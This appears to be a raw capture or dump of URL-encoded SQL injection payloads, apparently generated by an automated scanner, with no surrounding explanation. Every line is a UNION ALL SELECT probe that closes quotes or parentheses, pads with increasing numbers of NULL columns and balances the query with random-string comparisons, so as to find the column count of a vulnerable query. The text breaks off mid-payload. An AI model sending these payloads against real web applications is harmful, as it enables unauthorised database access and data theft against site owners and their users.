1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22XebR%22%3D%22XebR 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22zEbx%22%3D%22zEbx 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22YUlm%22%3D%22YUlm 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ziIy%22%3D%22ziIy 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22SbsC%22%3D%22SbsC 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22bUZG%22%3D%22bUZG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22vPeG%22%3D%22vPeG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22EXHo%22%3D%22EXHo 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22fdwY%22%3D%22fdwY 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ENal%22%3D%22ENal 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22FECO%22%3D%22FECO 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22nPPv%22%3D%22nPPv 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ceRm%22%3D%22ceRm 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22FQuq%22%3D%22FQuq 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22aERs%22%3D%22aERs 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22uEER%22%3D%22uEER 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22YrzG%22%3D%22YrzG 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22krjp%22%3D%22krjp 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22NNUD%22%3D%22NNUD 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22GuOT%22%20LIKE%20%22GuOT 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22EqbA%22%20LIKE%20%22EqbA 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22xJfe%22%20LIKE%20%22xJfe 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22EbEN%22%20LIKE%20%22EbEN 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22DZCy%22%20LIKE%20%22DZCy 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22GGCr%22%20LIKE%20%22GGCr 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22FKIi%22%20LIKE%20%22FKIi 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22msNn%22%20LIKE%20%22msNn 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22YxRc%22%20LIKE%20%22YxRc 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22uxkE%22%20LIKE%20%22uxkE 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22sxbQ%22%20LIKE%20%22sxbQ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22WPgs%22%20LIKE%20%22WPgs 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22XGkD%22%20LIKE%20%22XGkD 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22qmQW%22%20LIKE%20%22qmQW 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22mUsQ%22%20LIKE%20%22mUsQ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22UFXa%22%20LIKE%20%22UFXa 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22UHpb%22%20LIKE%20%22UHpb 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22SQNN%22%20LIKE%20%22SQNN 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22VAPk%22%20LIKE%20%22VAPk 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Uija%22%20LIKE%20%22Uija 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22QITH%22%20LIKE%20%22QITH 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22rtUA%22%20LIKE%20%22rtUA 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22yWWO%22%20LIKE%20%22yWWO 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22laDa%22%20LIKE%20%22laDa 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22dPSz%22%20LIKE%20%22dPSz 